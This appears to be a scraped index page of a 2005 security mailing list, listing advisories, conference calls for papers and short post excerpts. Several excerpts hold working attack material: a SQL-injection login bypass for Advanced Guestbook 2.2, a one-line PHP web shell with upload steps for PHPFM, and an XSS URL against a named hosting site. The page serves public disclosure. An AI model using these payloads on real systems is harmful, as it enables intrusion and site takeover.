|
|
Colapse all |
Post message
[EEYEB-20050901] Windows Metafile SetPalette Entries Heap OVerflow Vulnerability (Graphics Rendering Engine Vulnerability) 2005-11-08 Advisories eeye com Re: Hidden accounts on sony vaio laptops 2005-11-08 Williams, James K (James Williams ca com) Not a Sony issue. This setup has been documented by MS since the release of Windows XP in 2001. "Q: How can I add an Administrator password to make my computer more secure? A: Another way to make your computer more secure is to assign a password to the Administrator account, which is blank b [ more ] [ reply ] [SECURITY] [DSA 889-1] New enigmail packages fix information disclosure 2005-11-08 joey infodrom org (Martin Schulze) Advisory 21/2005: Multiple vulnerabilities in PHPKIT 2005-11-08 Christopher Kunz (christopher kunz hardened-php net) Call For Papers 2005-11-08 first-2006papers first org Call For Papers 18th Annual FIRST Conference Baltimore, MD June 25-30, 2006 The Forum of Incident Response and Security Teams (FIRST, http://www.first.org/) is a global organization dedicated to bringing together computer security incident response teams (CSIRTs). The annual FIRST conference no [ more ] [ reply ] MDKSA-2005:205 - Updated clamav packages fix multiple vulnerabilities 2005-11-08 Mandriva Security Team (security mandriva com) Oracle DBMS_ASSERT and the October 2005 CPU 2005-11-08 NGSSoftware Insight Security Research (nisr nextgenss com) Whilst there are problems with the Oracle October 2005 Critical Patch Update, it's not all bad news.... There is a great deal of evidence in this patch that Oracle are beginning to treat security properly. They've introduced a new package PL/SQL package DBMS_ASSERT into the RDBMS. Whilst DBMS_AS [ more ] [ reply ] Oracle October 2005 CPU Problems 2005-11-08 NGSSoftware Insight Security Research (nisr nextgenss com) Examining the Oracle October 2005 Critical Patch Update in depth, NGSResearchers discovered a number of problems which have all since been reported to Oracle. As well as new vulnerabilities and problems with the patches for old vulnerabilities, the October 2005 CPU fails to install the patched O [ more ] [ reply ] LayerOne 2006 CFP Released 2005-11-07 Layer One (layeronecfp gmail com) LayerOne 2006 - Call for Papers April 22 & 23, 2006 Los Angeles, California At the Pasadena Hilton http://layerone.info What is LayerOne? Currently in its 3rd year, LayerOne is computer security and technology conference held in the Los Angeles area. The purpose of LayerOne is to bring together the [ more ] [ reply ] e107 Games System exploit 2005-11-07 willey_wonka hotmail com You get insert a highscore into game_score.php using post method. The system uses these variables, so a simple form will allow you to add a highscore. $player_name = $_POST['name']; $player_score = $_POST['score']; $game_name = $_POST['game']; willeh willey_wonka at hotmail dot com [ more ] [ reply ] Re: Re: Mambo Open Source, Path disclosure 2005-11-06 trueend5 yahoo com You are right mamboserver soloution is available now: The fix is easy, in /component/com_content/content.php Approx Line 190 Change the block FROM: Code: // Paramters $params = new stdClass(); if ( $Itemid ) { $menu = new mosMenu( $database ); $menu->load( $Itemid ); $params =& new mosPa [ more ] [ reply ] Advanced Guestbook 2.2 ( SQL Injection Exploit ) 2005-11-06 bhs_team yahoo com Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access. Target : http://www.example.com/[GuestbookTarget]/admin.php Username: ' or 1=1 /* Password: (Nothing)(Blank) It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix t [ more ] [ reply ] Asterisk vmail.cgi vulnerability 2005-11-07 advisories+asterisk assurance com au Assurance.com.au - Vulnerability Advisory ----------------------------------------------- Release Date: 07-Nov-2005 Software: Asterisk Web-VoiceMail (Comedian VoiceMail) http://www.asterisk.org/ Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and provides all of the [ more ] [ reply ] [USN-214-1] libungif vulnerabilities 2005-11-07 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-214-1 November 07, 2005 libungif4 vulnerabilities CVE-2005-2974, CVE-2005-3350 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (W [ more ] [ reply ] TWiki 20030201 VIEW string remote command execution 2005-11-07 GeekZ securityfocus com, "[at]" securityfocus com,WorldDefacers securityfocus com, "[d0t]" securityfocus com,NeT securityfocus com upload phpshell in PHPFM 2005-11-07 GeekZ securityfocus com, "[at]" securityfocus com,WorldDefacers securityfocus com, "[d0t]" securityfocus com,NeT securityfocus com upload phpshell in PHPFM discovered by rUnViRuS www.worlddefacers.net www.security-arab.com =-=-=-=-=-=-=-=-= the code shell :- --------------- <pre> <? passthru($_GET['cmd']); ?>> save as > cmd.php now upload in PHPFM =-=-=-= Used Shell =-=-=-= www.site.com/[file upload name]/[files]/cmd.php?cmd [ more ] [ reply ] XSS vulnerability in names.co.uk framed hosting 2005-11-07 reuben 31 nickname net names.co.uk is an English registrar and web hosting company. Their frames-based hosting option has an XSS vulnerability allowing injection of arbitrary Javascript. For example: http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert %281%29%22%20 According to webhosting.info, nam [ more ] [ reply ] Re: [Full-disclosure] Re: readdir_r considered harmful 2005-11-07 Andrew Farmer (andfarm gmail com) (1 replies) On 06 Nov 05, at 01:00, Casper.Dik (at) Sun (dot) COM [email concealed] wrote: >> Then you never really understood the implementation, seems. Of >> course >> all implementations keep the content of the directory as read with >> getdents or so in the DIR descriptor. But it is usually not the case >> that the whole content fi [ more ] [ reply ] [ GLSA 200511-06 ] fetchmail: Password exposure in fetchmailconf 2005-11-06 Thierry Carrez (koon gentoo org) [SECURITY] [DSA 884-1] New Horde3 packages fix insecure default installation 2005-11-07 joey infodrom org (Martin Schulze) SEC Consult SA-20051107-0 :: toendaCMS multiple vulnerabilites 2005-11-07 Bernhard Mueller (research sec-consult com) |
|
Privacy Statement |
(Graphics Rendering Engine Vulnerability)
Release Date:
November 8, 2005
Date Reported:
September 1, 2005
Severity:
High (Code Execution)
Vendor:
Microsoft
Systems Affected:
Windows 2000
Windows XP SP0, SP1
Windows Server 2003 SP0
[ more ] [ reply ]